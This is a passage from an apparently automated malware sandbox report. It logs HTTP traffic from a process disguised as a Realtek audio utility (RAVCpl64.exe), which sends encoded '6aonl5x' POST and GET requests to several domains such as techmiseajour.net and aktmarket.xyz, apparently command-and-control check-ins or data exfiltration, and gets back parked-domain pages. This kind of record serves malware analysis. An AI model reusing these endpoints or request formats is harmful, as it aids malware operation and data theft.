                                                                                                  Data Raw: 31 34 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 75 6e 79 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 62 61 68 61 65 6e 67 2e 63 6f 6d 20 69 73 20 70 61 72 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 [TRUNCATED]
                                                                                                  Data Ascii: 14fd<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.bahaeng.com is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.logo { width: auto; max-hei [TRUNCATED]
                                                                                                  Dec 3, 2024 09:51:22.513552904 CET1289INData Raw: 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 6c 6f 67 6f 63 6f 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e
                                                                                                  Data Ascii: margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 10px; } .langselect img { position: rel
                                                                                                  Dec 3, 2024 09:51:22.513562918 CET1289INData Raw: 3e 57 68 6f 20 6f 77 6e 73 20 74 68 65 20 64 6f 6d 61 69 6e 3f 3c 2f 61 3e 27 2c 0a 20 20 20 20 20 20 20 20 6e 6f 3a 20 70 75 6e 79 63 6f 64 65 2e 74 6f 55 6e 69 63 6f 64 65 28 27 77 77 77 2e 62 61 68 61 65 6e 67 2e 63 6f 6d 27 29 20 2b 20 27 20
                                                                                                  Data Ascii: >Who owns the domain?</a>', no: punycode.toUnicode('www.bahaeng.com') + ' er registrert, men har ingen aktiv nettside enn. <br>Andre tjenester, som f.eks. epost, kan vre aktivt brukt av eieren.<br><br><a href="https://www.domenesho
                                                                                                  Dec 3, 2024 09:51:22.513654947 CET1289INData Raw: 61 65 6e 67 2e 63 6f 6d 0a 20 20 20 20 20 20 20 20 69 73 20 70 61 72 6b 65 64 0a 20 20 20 20 20 20 3c 2f 68 31 3e 0a 20 20 20 20 20 20 3c 70 20 69 64 3d 22 6d 22 3e 0a 20 20 20 20 20 20 20 20 77 77 77 2e 62 61 68 61 65 6e 67 2e 63 6f 6d 0a 20 20
                                                                                                  Data Ascii: aeng.com is parked </h1> <p id="m"> www.bahaeng.com is registered, but the owner currently does not have an active website here. <br />Other services, such as e-mail, may be actively used by the
                                                                                                  Dec 3, 2024 09:51:22.513664961 CET488INData Raw: 6e 0a 20 20 20 20 20 20 20 20 3e 52 65 71 75 65 73 74 20 49 44 3a 0a 20 20 20 20 20 20 20 20 31 37 33 39 30 38 37 63 65 62 36 63 37 65 61 65 35 66 32 38 35 35 31 38 36 39 37 31 30 38 36 33 2f 70 61 72 6b 65 64 77 65 62 30 31 0a 20 20 20 20 20 20
                                                                                                  Data Ascii: n >Request ID: 1739087ceb6c7eae5f28551869710863/parkedweb01 </span> </div> <script> q("ls").setAttribute("style", ""); function setLang(s) { s = s in h ? s : "en"; q("t").innerHTML =


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  61192.168.11.304992674.208.236.156805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:30.715660095 CET421OUTGET /raea/?6aonl5x=PqKj/8KuIq0WSNkJftYVxtH3PgUbwps1M43YI/iJd5qBB0feLv8ZTW6bO6iF0HlQbmuDykhZpdeI6maFWjppzEXgG+P+iq4B6j/LVXeOdEURVWf/EIQOijo=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.christinascuties.net
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:51:30.851119995 CET770INHTTP/1.1 404 Not Found
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 626
                                                                                                  Connection: close
                                                                                                  Date: Tue, 03 Dec 2024 08:51:30 GMT
                                                                                                  Server: Apache
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  62192.168.11.304992784.32.84.32805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:36.076575041 CET687OUTPOST /jytl/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.techmiseajour.net
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.techmiseajour.net
                                                                                                  Referer: http://www.techmiseajour.net/jytl/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 53 59 74 6b 76 79 37 6d 44 68 2b 33 2b 58 30 4f 6f 34 39 55 43 52 78 68 30 66 2b 32 4f 51 49 48 75 74 4a 79 61 75 55 35 55 51 44 61 65 4c 6d 4b 63 6d 43 34 33 49 4c 31 47 71 72 51 55 4d 4f 4e 72 6f 77 55 75 4f 4f 6f 4b 4e 55 65 6e 52 37 6d 50 6d 6f 67 47 31 34 35 45 55 74 6e 49 4b 5a 79 38 50 33 32 79 6a 6e 68 69 4f 51 75 4a 38 7a 79 62 6d 47 76 69 4e 2b 58 62 57 6a 79 46 45 58 44 37 70 4d 68 78 7a 64 30 6a 4b 79 62 5a 6a 30 65 41 61 44 55 6a 58 57 57 38 6f 2b 69 48 76 4a 6a 79 4b 67 55 56 58 4f 31 65 71 6c 51 36 64 30 6d 65 47 59 61 4c 51 3d 3d
                                                                                                  Data Ascii: 6aonl5x=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUjXWW8o+iHvJjyKgUVXO1eqlQ6d0meGYaLQ==


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  63192.168.11.304992884.32.84.32805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:38.827339888 CET707OUTPOST /jytl/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.techmiseajour.net
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.techmiseajour.net
                                                                                                  Referer: http://www.techmiseajour.net/jytl/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 54 34 39 6b 74 52 44 6d 50 52 2b 77 69 48 30 4f 79 49 39 51 43 52 74 68 30 61 65 6d 4f 47 34 48 75 49 31 79 62 76 55 35 5a 77 44 61 57 72 6d 31 42 57 43 7a 33 49 48 4c 47 72 6e 51 55 4d 61 4e 72 70 41 55 75 2f 4f 6e 4c 64 55 63 71 78 37 6b 53 57 6f 67 47 31 34 35 45 58 52 42 49 4b 42 79 38 2f 48 32 7a 47 4c 69 71 75 51 74 4f 38 7a 79 66 6d 47 72 69 4e 2f 34 62 55 58 55 46 48 76 44 37 73 77 68 2f 48 70 33 74 4b 79 64 47 7a 31 43 4a 66 32 62 36 57 75 6a 34 71 4c 2f 50 64 74 6c 33 64 4e 4f 49 55 36 33 4e 4b 5a 39 6d 63 5a 4f 63 45 5a 42 57 53 67 6f 4b 6a 54 30 2f 6f 54 58 72 50 56 43 67 55 69 69 57 6f 77 3d
                                                                                                  Data Ascii: 6aonl5x=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOG4HuI1ybvU5ZwDaWrm1BWCz3IHLGrnQUMaNrpAUu/OnLdUcqx7kSWogG145EXRBIKBy8/H2zGLiquQtO8zyfmGriN/4bUXUFHvD7swh/Hp3tKydGz1CJf2b6Wuj4qL/Pdtl3dNOIU63NKZ9mcZOcEZBWSgoKjT0/oTXrPVCgUiiWow=


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  64192.168.11.304992984.32.84.32805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:41.575098038 CET1289OUTPOST /jytl/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.techmiseajour.net
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.techmiseajour.net
                                                                                                  Referer: http://www.techmiseajour.net/jytl/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 54 34 39 6b 74 52 44 6d 50 52 2b 77 69 48 30 4f 79 49 39 51 43 52 74 68 30 61 65 6d 4f 47 77 48 75 36 4e 79 61 49 41 35 59 77 44 61 63 4c 6d 4f 42 57 43 55 33 4c 33 78 47 72 36 72 55 50 69 4e 71 4f 6f 55 6f 4c 36 6e 42 64 55 63 6a 52 37 6c 50 6d 70 30 47 32 42 79 45 55 35 42 49 4b 42 79 38 39 76 32 69 54 6e 69 73 75 51 75 4a 38 7a 75 62 6d 47 54 69 4e 6e 43 62 58 37 69 46 46 2f 44 36 66 34 68 2f 30 42 33 74 4b 79 64 50 54 31 50 4a 66 79 47 36 57 33 71 34 6f 36 45 50 74 4a 6c 32 59 73 36 63 6e 47 7a 65 37 70 55 36 74 74 6b 59 46 64 7a 63 78 77 56 43 77 33 74 70 71 37 32 6a 5a 42 65 78 6e 7a 6b 4a 64 45 44 53 32 7a 62 78 44 51 66 73 30 4d 4c 56 5a 30 63 6f 78 57 70 73 33 72 79 52 31 47 78 74 6d 34 62 32 50 4d 4c 38 30 6c 4d 45 53 73 44 71 50 44 6c 62 41 52 56 33 79 6c 71 73 41 69 2b 50 49 7a 50 63 6e 46 4d 66 61 6b 6a 71 37 2b 6c 34 75 35 43 2b 59 47 30 63 54 34 67 30 4f 63 4a 39 59 73 2f 62 74 7a 4c 43 32 78 39 42 41 4d 77 59 6a 56 4b 5a 61 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOGwHu6NyaIA5YwDacLmOBWCU3L3xGr6rUPiNqOoUoL6nBdUcjR7lPmp0G2ByEU5BIKBy89v2iTnisuQuJ8zubmGTiNnCbX7iFF/D6f4h/0B3tKydPT1PJfyG6W3q4o6EPtJl2Ys6cnGze7pU6ttkYFdzcxwVCw3tpq72jZBexnzkJdEDS2zbxDQfs0MLVZ0coxWps3ryR1Gxtm4b2PML80lMESsDqPDlbARV3ylqsAi+PIzPcnFMfakjq7+l4u5C+YG0cT4g0OcJ9Ys/btzLC2x9BAMwYjVKZaZxQPHmPmYLInfAmYvjfSXJ8iOC0PP8A0bULw0ccOT4kdct+xdWH+CQQg+TYzacmC0gNxlyK2G8hR7i4umeCClCTaM/nVNEDs3CQ/c25r0x/9j7Xn6w+W5jOe5sOZXA2INf5l5ftsuoD8vUVLcbQG8QcE8fgK2765XFYhQHS2oWLTUVtFQtLy5ZIk19o6pIACMvaUYyAhIy/fa0VM+D+fOeWP7mOrbKR1bKLfbq7/bRY93ul+AdGYdtdeU8lYfCdzj0LvpjtavNHHOi0Zf6TggvjGwfG92Sa/6BZNaT4iWldHq21LkBOH68PnRjx/qPBiczDtE52pX7Mr+JwcMgp1PCsTHbgFrWvH04W15eIvCuzy49yzbT1TKF20/kffbTpxMxhUUfKryE33o1LiJWiq0kYQnX6XuMaOuxmehpFnPNQnxMvmeDnZHo+abnnpkrfQM0MnSo6cjgNck+hmAn+
                                                                                                  Dec 3, 2024 09:51:41.575150013 CET2535OUTData Raw: 59 71 53 71 48 34 33 56 57 35 50 4f 5a 36 54 71 33 50 72 6a 63 55 4f 6a 69 33 4f 4c 6c 6e 78 2f 54 31 36 74 37 52 33 32 54 79 75 4d 75 67 62 34 55 62 37 73 45 62 47 30 34 44 72 45 42 54 6b 6d 79 33 59 37 48 33 31 51 67 36 74 69 4a 74 52 47 76 56
                                                                                                  Data Ascii: YqSqH43VW5POZ6Tq3PrjcUOji3OLlnx/T16t7R32TyuMugb4Ub7sEbG04DrEBTkmy3Y7H31Qg6tiJtRGvVevGz/VZ6bY/LT/Vvw/9QksXnW5y9IaSkiokMY1VZMjhUSZWvBSig+g0cCFDcJM7ZkNHWuWpqW1lzHvMInPeOwYbnezpuTERvQvdu8+PCJO5gnR2LLH3lxNOvnbnc1l5bOmjk6etEvkp8IMrTW31lsT5iPBoYoUWdp


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  65192.168.11.304993184.32.84.32805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:44.308553934 CET418OUTGET /jytl/?6aonl5x=g6hM5OfAy0aZTOdzzizqGwSFwxhc1L9nbH1D7PSRWxwlxqBVZ/VTfBjjReyEGXu+lurHf7fRU8SuqLFFtve4Dt4YiF/6MWt/ODdeGnRIPeEv+Y3Y8H3JjIc=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.techmiseajour.net
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:51:44.524399042 CET1289INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 03 Dec 2024 08:51:44 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 9973
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Server: hcdn
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  x-hcdn-request-id: f9591fbc817cbab02d67b72b73f67674-asc-edge3
                                                                                                  Expires: Tue, 03 Dec 2024 08:51:43 GMT
                                                                                                  Cache-Control: no-cache
                                                                                                  Accept-Ranges: bytes
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m
                                                                                                  Dec 3, 2024 09:51:44.524517059 CET1289INData Raw: 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38
                                                                                                  Data Ascii: argin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:60
                                                                                                  Dec 3, 2024 09:51:44.524537086 CET1289INData Raw: 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f
                                                                                                  Data Ascii: ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;lin
                                                                                                  Dec 3, 2024 09:51:44.524554014 CET1289INData Raw: 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74
                                                                                                  Data Ascii: ze:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:
                                                                                                  Dec 3, 2024 09:51:44.524569035 CET1289INData Raw: 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f
                                                                                                  Data Ascii: -graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidde
                                                                                                  Dec 3, 2024 09:51:44.524584055 CET1289INData Raw: 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d
                                                                                                  Data Ascii: Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article
                                                                                                  Dec 3, 2024 09:51:44.524599075 CET1289INData Raw: 54 46 2d 31 36 20 76 61 6c 75 65 22 29 3b 36 35 35 33 35 3c 72 26 26 28 72 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d
                                                                                                  Data Ascii: TF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;
                                                                                                  Dec 3, 2024 09:51:44.524641991 CET1289INData Raw: 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63 6f 64 65 28 6d 29 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 76 61 72 20 68 2c 66 2c 69 2c 63 2c 75
                                                                                                  Data Ascii: harCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  66192.168.11.304993213.248.169.48805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:51:49.646483898 CET675OUTPOST /wb7v/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.aktmarket.xyz
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.aktmarket.xyz
                                                                                                  Referer: http://www.aktmarket.xyz/wb7v/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 39 7a 73 4f 2b 62 6d 4f 55 43 6d 73 6e 58 75 67 55 31 2f 77 58 48 36 61 55 45 66 63 34 36 68 45 44 74 52 2f 57 54 4a 58 51 30 56 57 57 63 59 56 75 57 58 63 33 71 6b 4a 33 4c 72 59 44 6f 47 4a 79 79 4d 31 65 68 6f 54 48 4d 46 50 58 75 39 5a 31 73 37 65 46 54 55 64 6f 32 2f 34 30 7a 46 6f 67 66 66 4a 72 66 6f 6d 74 68 74 51 68 37 35 48 76 63 6f 6d 4b 58 6d 34 68 39 65 55 54 2b 66 6d 55 55 31 75 4d 66 71 6a 51 42 38 4f 35 6a 77 71 44 68 72 33 6f 74 32 33 41 55 46 45 47 52 56 78 51 4c 37 77 66 4a 65 57 44 35 4a 50 73 47 33 53 32 67 71 59 64 77 3d 3d
                                                                                                  Data Ascii: 6aonl5x=FCc6E16lz2LQ9zsO+bmOUCmsnXugU1/wXH6aUEfc46hEDtR/WTJXQ0VWWcYVuWXc3qkJ3LrYDoGJyyM1ehoTHMFPXu9Z1s7eFTUdo2/40zFogffJrfomthtQh75HvcomKXm4h9eUT+fmUU1uMfqjQB8O5jwqDhr3ot23AUFEGRVxQL7wfJeWD5JPsG3S2gqYdw==


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
